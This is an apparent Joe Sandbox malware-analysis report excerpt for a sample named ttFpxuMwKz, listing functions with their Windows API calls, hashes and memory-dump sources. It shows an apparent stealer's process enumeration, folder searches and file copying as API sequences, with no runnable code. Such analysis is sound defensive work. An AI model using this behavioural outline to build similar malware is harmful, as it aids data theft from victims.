                                    • Instruction Fuzzy Hash: E3315C75E4020CAFDB14DFD0CD49BEDB7B9EB44300F10441AE506AA284DB78AE89CB56
                                    Function 007F88E7 Relevance: 6.1, APIs: 4, Instructions: 77processCOMMON
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 007FA9A7: lstrcpy.KERNEL32(00420E17,00000000), ref: 007FA9EF
                                    • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,004205B7), ref: 007F8931
                                    • Process32First.KERNEL32(?,00000128), ref: 007F8945
                                    • Process32Next.KERNEL32(?,00000128), ref: 007F895A
                                      • Part of subcall function 007FAC17: lstrlen.KERNEL32(?,0064A1F0,?,00424FBC,00420E17), ref: 007FAC2C
                                      • Part of subcall function 007FAC17: lstrcpy.KERNEL32(00000000), ref: 007FAC6B
                                      • Part of subcall function 007FAC17: lstrcat.KERNEL32(00000000,00000000), ref: 007FAC79
                                      • Part of subcall function 007FAB07: lstrcpy.KERNEL32(?,00420E17), ref: 007FAB6C
                                    • CloseHandle.KERNEL32(?), ref: 007F89C8
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2312211700.00000000007E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 007E0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_7e0000_ttFpxuMwKz.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: lstrcpy$Process32$CloseCreateFirstHandleNextSnapshotToolhelp32lstrcatlstrlen
                                    • String ID:
                                    • API String ID: 1066202413-0
                                    • Opcode ID: 8b5492bb2172847200a0110b71b51f63116bc16bb71ede11aa5be0a2ca02365c
                                    • Instruction ID: 647dec7101601ceb5ba0a6e474531da068432217f876f561291cf2368fc9717a
                                    • Opcode Fuzzy Hash: 8b5492bb2172847200a0110b71b51f63116bc16bb71ede11aa5be0a2ca02365c
                                    • Instruction Fuzzy Hash: 38315EB190121CEBCB64DF90DD55FFEB778EB45700F108199A20DA2290DB786E44CFA2
                                    Function 00418680 Relevance: 6.1, APIs: 4, Instructions: 77processCOMMON
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                                    • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,004205B7), ref: 004186CA
                                    • Process32First.KERNEL32(?,00000128), ref: 004186DE
                                    • Process32Next.KERNEL32(?,00000128), ref: 004186F3
                                      • Part of subcall function 0041A9B0: lstrlenA.KERNEL32(?,00421110,?,00000000,00420AEF), ref: 0041A9C5
                                      • Part of subcall function 0041A9B0: lstrcpy.KERNEL32(00000000), ref: 0041AA04
                                      • Part of subcall function 0041A9B0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041AA12
                                      • Part of subcall function 0041A8A0: lstrcpy.KERNEL32(?,B), ref: 0041A905
                                    • CloseHandle.KERNEL32(?), ref: 00418761
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2312038691.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000000.00000002.2312038691.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2312038691.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2312038691.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2312038691.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2312038691.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_400000_ttFpxuMwKz.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: lstrcpy$Process32$CloseCreateFirstHandleNextSnapshotToolhelp32lstrcatlstrlen
                                    • String ID:
                                    • API String ID: 1066202413-0
                                    • Opcode ID: 78e734e6add8f3848c475328f99532914076784f23aa1f873a6d1c9a0ebdb1a4
                                    • Instruction ID: 8f5abf7c5654a811b9b3f094c7d3948ba22bca0c3321aba4e2188e2e86b1b5ea
                                    • Opcode Fuzzy Hash: 78e734e6add8f3848c475328f99532914076784f23aa1f873a6d1c9a0ebdb1a4
                                    • Instruction Fuzzy Hash: F7315E71902218ABCB24EF95DC45FEEB778EF45714F10419EF10AA21A0DF386A85CFA5
                                    Function 00414F40 Relevance: 6.1, APIs: 4, Instructions: 70stringCOMMON
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 00418DE0: SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?,?,000003E8), ref: 00418E0B
                                    • lstrcatA.KERNEL32(?,00000000,?,00000104), ref: 00414F7A
                                    • lstrcatA.KERNEL32(?,00421070), ref: 00414F97
                                    • lstrcatA.KERNEL32(?,00A12F50), ref: 00414FAB
                                    • lstrcatA.KERNEL32(?,00421074), ref: 00414FBD
                                      • Part of subcall function 00414910: wsprintfA.USER32 ref: 0041492C
                                      • Part of subcall function 00414910: FindFirstFileA.KERNEL32(?,?), ref: 00414943
                                      • Part of subcall function 00414910: StrCmpCA.SHLWAPI(?,00420FDC), ref: 00414971
                                      • Part of subcall function 00414910: StrCmpCA.SHLWAPI(?,00420FE0), ref: 00414987
                                      • Part of subcall function 00414910: FindNextFileA.KERNEL32(000000FF,?), ref: 00414B7D
                                      • Part of subcall function 00414910: FindClose.KERNEL32(000000FF), ref: 00414B92
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2312038691.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000000.00000002.2312038691.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2312038691.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2312038691.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2312038691.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2312038691.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_400000_ttFpxuMwKz.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: lstrcat$Find$File$CloseFirstFolderNextPathwsprintf
                                    • String ID:
                                    • API String ID: 2667927680-0
                                    • Opcode ID: 33ad484c41b3b6fcfe3cd09fe7520dfc9098197ce8bfaf1b05ec43d91c9f3575
                                    • Instruction ID: b2f553c39a7574946245b6cc91baeb706efbd34a5fe7bafabb54328a91102e52
                                    • Opcode Fuzzy Hash: 33ad484c41b3b6fcfe3cd09fe7520dfc9098197ce8bfaf1b05ec43d91c9f3575
                                    • Instruction Fuzzy Hash: FA213DBAA402047BC714FBF0EC46FED333DAB55300F40455DB649920C1EE7896C88B96
                                    Function 004187C0 Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 64memoryCOMMON
                                    Download Yara Rule
                                    APIs
                                    • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,00420E28,00000000,?), ref: 0041882F
                                    • HeapAlloc.KERNEL32(00000000,?,?,?,?,00420E28,00000000,?), ref: 00418836
                                    • wsprintfA.USER32 ref: 00418850
                                      • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2312038691.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000000.00000002.2312038691.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2312038691.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2312038691.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2312038691.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2312038691.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_400000_ttFpxuMwKz.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Heap$AllocProcesslstrcpywsprintf
                                    • String ID: %dx%d
                                    • API String ID: 2716131235-2206825331
                                    • Opcode ID: 124e357ede7c9a4ec2e38b5c0962ba134007384ad5c1c3eeb759acb43c381339
                                    • Instruction ID: e741bf7ca2fc1d65a497d39fe48fe123552d5275a0b8a8093fc8d321cf3eb0b5
                                    • Opcode Fuzzy Hash: 124e357ede7c9a4ec2e38b5c0962ba134007384ad5c1c3eeb759acb43c381339
                                    • Instruction Fuzzy Hash: 48217FB5A80208BFDB00DFD4DD49FAEBBB9FB49B00F104119F605A7280C779A900CBA5
                                    Function 007F1A07 Relevance: 6.1, APIs: 4, Instructions: 53stringCOMMON
                                    Download Yara Rule
                                    APIs
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2312211700.00000000007E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 007E0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_7e0000_ttFpxuMwKz.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: ExitProcessstrtok_s
                                    • String ID:
                                    • API String ID: 3407564107-0
                                    • Opcode ID: 23663e118dc1d9675e857bc575fa0cf4eec126624f33d54e6aec62cd9d365414
                                    • Instruction ID: 5c5aae387920a935ba995ae77528c17e39cb89d9a2ba678576196460739acfc6
                                    • Opcode Fuzzy Hash: 23663e118dc1d9675e857bc575fa0cf4eec126624f33d54e6aec62cd9d365414
                                    • Instruction Fuzzy Hash: 4C1116B490120DEFCB04DFE4D958AFDBBB9FF04305F508469EA0AA6250E7746B44CB66
                                    Function 007F7BE7 Relevance: 6.1, APIs: 4, Instructions: 51memorytimeCOMMON
                                    Download Yara Rule
                                    APIs
                                    • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,00420E00,00000000,?), ref: 007F7C17
                                    • RtlAllocateHeap.NTDLL(00000000), ref: 007F7C1E
                                    • GetLocalTime.KERNEL32(?,?,?,?,?,00420E00,00000000,?), ref: 007F7C2B
                                    • wsprintfA.USER32 ref: 007F7C5A
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2312211700.00000000007E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 007E0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_7e0000_ttFpxuMwKz.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Heap$AllocateLocalProcessTimewsprintf
                                    • String ID:
                                    • API String ID: 377395780-0
                                    • Opcode ID: d25a51ab8cf6fccfa60616151632c2f03c452b8beb60607c736287f9abe72aa2
                                    • Instruction ID: 6defce09804016e146fa15f6920e0dd4656227ad1cdadd6d9d47392815d5cafa
                                    • Opcode Fuzzy Hash: d25a51ab8cf6fccfa60616151632c2f03c452b8beb60607c736287f9abe72aa2
                                    • Instruction Fuzzy Hash: 2A1139B2944118ABCB14DFC9DD45BBEB7F9FB4DB11F10421AF605A2280D3395940CBB1
                                    Function 00417980 Relevance: 6.1, APIs: 4, Instructions: 51memorytimeCOMMON
                                    Download Yara Rule
                                    APIs
                                    • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,00420E00,00000000,?), ref: 004179B0
                                    • HeapAlloc.KERNEL32(00000000,?,?,?,?,00420E00,00000000,?), ref: 004179B7
                                    • GetLocalTime.KERNEL32(?,?,?,?,?,00420E00,00000000,?), ref: 004179C4
                                    • wsprintfA.USER32 ref: 004179F3
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2312038691.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000000.00000002.2312038691.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2312038691.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2312038691.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2312038691.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2312038691.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_400000_ttFpxuMwKz.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Heap$AllocLocalProcessTimewsprintf
                                    • String ID:
                                    • API String ID: 1243822799-0
                                    • Opcode ID: d25a51ab8cf6fccfa60616151632c2f03c452b8beb60607c736287f9abe72aa2
                                    • Instruction ID: 87643aaeb61937c0b28f46190d625ee9f9fa63f6271d25fb840393839df263de
                                    • Opcode Fuzzy Hash: d25a51ab8cf6fccfa60616151632c2f03c452b8beb60607c736287f9abe72aa2
                                    • Instruction Fuzzy Hash: 6D1139B2944118ABCB14DFC9DD45BBEB7F9FB4DB11F10421AF605A2280E3395940CBB5
                                    Function 007F7C97 Relevance: 6.0, APIs: 4, Instructions: 49memorytimeCOMMON
                                    Download Yara Rule
                                    APIs
                                    • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00000000,00000000,?,0064A248,00000000,?,00420E10,00000000,?,00000000,00000000), ref: 007F7CCA
                                    • RtlAllocateHeap.NTDLL(00000000), ref: 007F7CD1
                                    • GetTimeZoneInformation.KERNEL32(?,?,?,?,00000000,00000000,?,0064A248,00000000,?,00420E10,00000000,?,00000000,00000000,?), ref: 007F7CE4
                                    • wsprintfA.USER32 ref: 007F7D1E
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2312211700.00000000007E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 007E0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_7e0000_ttFpxuMwKz.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Heap$AllocateInformationProcessTimeZonewsprintf
                                    • String ID:
                                    • API String ID: 3317088062-0
                                    • Opcode ID: b881c6b0ead1d296197200307cca27ecd4ed8ab0e7bcc50e28ea7705d7869b14
                                    • Instruction ID: 57cc79f3daa855ea8e99f03f98598ea04790b6be26f27f7730785baa05c248a7
                                    • Opcode Fuzzy Hash: b881c6b0ead1d296197200307cca27ecd4ed8ab0e7bcc50e28ea7705d7869b14
                                    • Instruction Fuzzy Hash: 68115EB1A49218EFEB248F54DC49FA9B7B8FB05721F1043DAE61AA32C0C7785940CF51
                                    Function 007F3880 Relevance: 6.0, APIs: 4, Instructions: 45stringCOMMON
                                    Download Yara Rule
                                    APIs
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2312211700.00000000007E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 007E0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_7e0000_ttFpxuMwKz.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: strtok_s
                                    • String ID:
                                    • API String ID: 3330995566-0
                                    • Opcode ID: 88ee3256d646c21cc813880afdb35c02c7abfa0159f377c054558803c8e079b0
                                    • Instruction ID: 9d67ccc373d8bb28dd9cf01f35e6dc4f8b295b209e9553e4741b1ebe3b2cf270
                                    • Opcode Fuzzy Hash: 88ee3256d646c21cc813880afdb35c02c7abfa0159f377c054558803c8e079b0
                                    • Instruction Fuzzy Hash: 9C11C5B4E40209EFDB14CFE6D948AAEB7B5BB04745F10C029E125A6250D7B8A605CF65
                                    Function 007F9547 Relevance: 6.0, APIs: 4, Instructions: 39fileCOMMON
                                    Download Yara Rule
                                    APIs
                                    • CreateFileA.KERNEL32(007F3D55,80000000,00000003,00000000,00000003,00000080,00000000,?,007F3D55,?), ref: 007F9563
                                    • GetFileSizeEx.KERNEL32(000000FF,007F3D55), ref: 007F9580
                                    • CloseHandle.KERNEL32(000000FF), ref: 007F958E
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2312211700.00000000007E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 007E0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_7e0000_ttFpxuMwKz.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: File$CloseCreateHandleSize
                                    • String ID:
                                    • API String ID: 1378416451-0
                                    • Opcode ID: f462b5cb5e9955b16ef4a6797186c4cfbf9f6fe3abbcd1d27cc58421f490090d
                                    • Instruction ID: 5193c814e6dbdc472404c9dd9fc82c9ffb8f2366a2d1d6e51c8a242deebc76ac
                                    • Opcode Fuzzy Hash: f462b5cb5e9955b16ef4a6797186c4cfbf9f6fe3abbcd1d27cc58421f490090d
                                    • Instruction Fuzzy Hash: E1F04F39E40208BBDB20DFF0DC49BAE77BAEB49710F10C654FB11A72C0D63996118B41
                                    Function 007F6D5A Relevance: 6.0, APIs: 4, Instructions: 30sleepCOMMON
                                    Download Yara Rule
                                    APIs
                                    • OpenEventA.KERNEL32(001F0003,00000000,00000000,00000000,?,0064A540,?,0042110C,?,00000000,?,00421110,?,00000000,00420AEF), ref: 007F6D31
                                    • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 007F6D4F
                                    • CloseHandle.KERNEL32(00000000), ref: 007F6D60
                                    • Sleep.KERNEL32(00001770), ref: 007F6D6B
                                    • CloseHandle.KERNEL32(?,00000000,?,0064A540,?,0042110C,?,00000000,?,00421110,?,00000000,00420AEF), ref: 007F6D81
                                    • ExitProcess.KERNEL32 ref: 007F6D89
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2312211700.00000000007E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 007E0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_7e0000_ttFpxuMwKz.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: CloseEventHandle$CreateExitOpenProcessSleep
                                    • String ID:
                                    • API String ID: 941982115-0
                                    • Opcode ID: 5d3735d569cffe7bbea000e7acfc03b16a2d4300877d619867e3aa12521868c8
                                    • Instruction ID: 7f06078158e00ce1db07e51b357041f4de053ec514972b12c1ef89b0c4c8b917
                                    • Opcode Fuzzy Hash: 5d3735d569cffe7bbea000e7acfc03b16a2d4300877d619867e3aa12521868c8
                                    • Instruction Fuzzy Hash: 13F058B8B8060DFEEB10ABE0DC0ABBD7675FB05741F201A18F702A5390CBB84500CA66
                                    Function 00406D40 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 157COMMON
                                    Download Yara Rule
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2312038691.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000000.00000002.2312038691.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2312038691.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2312038691.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2312038691.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2312038691.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_400000_ttFpxuMwKz.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID: `o@
                                    • API String ID: 0-590292170
                                    • Opcode ID: 7ad59576bd09cc7eceacd48e5d7f84764234e902501c4ca3efc067249123903a
                                    • Instruction ID: c65cc5113f4fbf7636557f8b1f026e9f2285814709fd8c8344c4410f81c0aea8
                                    • Opcode Fuzzy Hash: 7ad59576bd09cc7eceacd48e5d7f84764234e902501c4ca3efc067249123903a
                                    • Instruction Fuzzy Hash: A66138B4900219EFCB14DF94E944BEEB7B1BB04304F1185AAE40A77380D739AEA4DF95
                                    Function 00414BB0 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 118stringCOMMON
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 00418DE0: SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?,?,000003E8), ref: 00418E0B
                                    • lstrcatA.KERNEL32(?,00000000,?,00000104), ref: 00414BEA
                                    • lstrcatA.KERNEL32(?,00A1A040), ref: 00414C08
                                      • Part of subcall function 00414910: wsprintfA.USER32 ref: 0041492C
                                      • Part of subcall function 00414910: FindFirstFileA.KERNEL32(?,?), ref: 00414943
                                      • Part of subcall function 00414910: StrCmpCA.SHLWAPI(?,00420FDC), ref: 00414971
                                      • Part of subcall function 00414910: StrCmpCA.SHLWAPI(?,00420FE0), ref: 00414987
                                      • Part of subcall function 00414910: FindNextFileA.KERNEL32(000000FF,?), ref: 00414B7D
                                      • Part of subcall function 00414910: FindClose.KERNEL32(000000FF), ref: 00414B92
                                      • Part of subcall function 00414910: wsprintfA.USER32 ref: 004149B0
                                      • Part of subcall function 00414910: StrCmpCA.SHLWAPI(?,004208D2), ref: 004149C5
                                      • Part of subcall function 00414910: wsprintfA.USER32 ref: 004149E2
                                      • Part of subcall function 00414910: PathMatchSpecA.SHLWAPI(?,?), ref: 00414A1E
                                      • Part of subcall function 00414910: lstrcatA.KERNEL32(?,00A130A0,?,000003E8), ref: 00414A4A
                                      • Part of subcall function 00414910: lstrcatA.KERNEL32(?,00420FF8), ref: 00414A5C
                                      • Part of subcall function 00414910: lstrcatA.KERNEL32(?,?), ref: 00414A70
                                      • Part of subcall function 00414910: lstrcatA.KERNEL32(?,00420FFC), ref: 00414A82
                                      • Part of subcall function 00414910: lstrcatA.KERNEL32(?,?), ref: 00414A96
                                      • Part of subcall function 00414910: CopyFileA.KERNEL32(?,?,00000001), ref: 00414AAC
                                      • Part of subcall function 00414910: DeleteFileA.KERNEL32(?), ref: 00414B31
                                      • Part of subcall function 00414910: wsprintfA.USER32 ref: 00414A07
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2312038691.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000000.00000002.2312038691.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2312038691.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2312038691.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2312038691.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2312038691.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_400000_ttFpxuMwKz.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: lstrcat$Filewsprintf$Find$Path$CloseCopyDeleteFirstFolderMatchNextSpec
                                    • String ID: UaA
                                    • API String ID: 2104210347-3893042857
                                    • Opcode ID: 2cac0148d2110f3df46bb078800b33f8f0db55810685f274a968c650ce667207
                                    • Instruction ID: 5a37e5a53a2562059c730f6b0b3ae842953eee94398a2728108a858f2c1bafc2
                                    • Opcode Fuzzy Hash: 2cac0148d2110f3df46bb078800b33f8f0db55810685f274a968c650ce667207
                                    • Instruction Fuzzy Hash: 9341C5BA6001047BD754FBB0EC42EEE337DA785700F40851DB54A96186EE795BC88BA6
                                    Function 00418B60 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 60timeCOMMON
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                                    • GetSystemTime.KERNEL32(?,00A14A78,004205AE,?,?,?,?,?,?,?,?,?,00404963,?,00000014), ref: 00418B86
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2312038691.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000000.00000002.2312038691.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2312038691.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2312038691.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2312038691.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2312038691.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_400000_ttFpxuMwKz.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: SystemTimelstrcpy
                                    • String ID: cI@$cI@
                                    • API String ID: 62757014-1697673767
                                    • Opcode ID: 270aac1f6b61675edb1843e8a635b5515c73b826a4035c958f1de1623f3f8d38
                                    • Instruction ID: 15f3dfc6f8d56a301bf8b2a7a9260479b6db203ca669f730be279af5ebf73ee3
                                    • Opcode Fuzzy Hash: 270aac1f6b61675edb1843e8a635b5515c73b826a4035c958f1de1623f3f8d38
                                    • Instruction Fuzzy Hash: 7111E971D00008AFCB04EFA9C8919EE77B9EF58314F04C05EF01667241DF38AA86CBA6
                                    Function 00415050 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 48stringCOMMON
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 00418DE0: SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?,?,000003E8), ref: 00418E0B
                                    • lstrcatA.KERNEL32(?,00000000,?,00000104), ref: 0041508A
                                    • lstrcatA.KERNEL32(?,00A192F8), ref: 004150A8
                                      • Part of subcall function 00414910: wsprintfA.USER32 ref: 0041492C
                                      • Part of subcall function 00414910: FindFirstFileA.KERNEL32(?,?), ref: 00414943
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2312038691.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000000.00000002.2312038691.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2312038691.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2312038691.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2312038691.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2312038691.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_400000_ttFpxuMwKz.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: lstrcat$FileFindFirstFolderPathwsprintf
                                    • String ID: aA
                                    • API String ID: 2699682494-2567749500
                                    • Opcode ID: 7d8f81950f29c353dc6eca79efceced1e8debec432d06c8626770cf998b7186f
                                    • Instruction ID: 27646669aa04729862e240b26620d37997e147c17b59a732ce93ef494e7ce50b
                                    • Opcode Fuzzy Hash: 7d8f81950f29c353dc6eca79efceced1e8debec432d06c8626770cf998b7186f
                                    • Instruction Fuzzy Hash: B801D6BAA4020877C714FBB0DC42EEE333CAB55304F00415DB68A570D1EE789AC88BA6
                                    Function 007EBCE7 Relevance: 5.3, APIs: 4, Instructions: 284stringCOMMON
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 007FA9A7: lstrcpy.KERNEL32(00420E17,00000000), ref: 007FA9EF
                                      • Part of subcall function 007FAC17: lstrlen.KERNEL32(?,0064A1F0,?,00424FBC,00420E17), ref: 007FAC2C
                                      • Part of subcall function 007FAC17: lstrcpy.KERNEL32(00000000), ref: 007FAC6B
                                      • Part of subcall function 007FAC17: lstrcat.KERNEL32(00000000,00000000), ref: 007FAC79
                                      • Part of subcall function 007FAB87: lstrcpy.KERNEL32(00000000,?), ref: 007FABD9
                                      • Part of subcall function 007FAB87: lstrcat.KERNEL32(00000000), ref: 007FABE9
                                      • Part of subcall function 007FAB07: lstrcpy.KERNEL32(?,00420E17), ref: 007FAB6C
                                      • Part of subcall function 007FAA07: lstrcpy.KERNEL32(?,00000000), ref: 007FAA4D
                                      • Part of subcall function 007EA077: memcmp.MSVCRT(?,00421264,00000003), ref: 007EA094
                                    • lstrlen.KERNEL32(00000000), ref: 007EBF06
                                      • Part of subcall function 007F9097: LocalAlloc.KERNEL32(00000040,-00000001), ref: 007F90B9
                                    • StrStrA.SHLWAPI(00000000,004213E0), ref: 007EBF34
                                    • lstrlen.KERNEL32(00000000), ref: 007EC00C
                                    • lstrlen.KERNEL32(00000000), ref: 007EC020
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2312211700.00000000007E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 007E0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_7e0000_ttFpxuMwKz.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: lstrcpy$lstrlen$lstrcat$AllocLocalmemcmp
                                    • String ID:
                                    • API String ID: 1440504306-0
                                    • Opcode ID: 9e08ee45ebc43fe706c0c8ad989736c962bf943befa7584f1b5ac42d019a3d06
                                    • Instruction ID: 8ba16799a1714b03ad6022c358115d60d73370ea3c1b29b4afb68a4cb7ff5084
                                    • Opcode Fuzzy Hash: 9e08ee45ebc43fe706c0c8ad989736c962bf943befa7584f1b5ac42d019a3d06
                                    • Instruction Fuzzy Hash: D9B1F0B5910218EBCB14EBA0DD5ADFE7739AF54300F404169F60A62291EF386A48CB62
                                    Function 00413BDB Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 16filestringCOMMON
                                    Download Yara Rule
                                    APIs
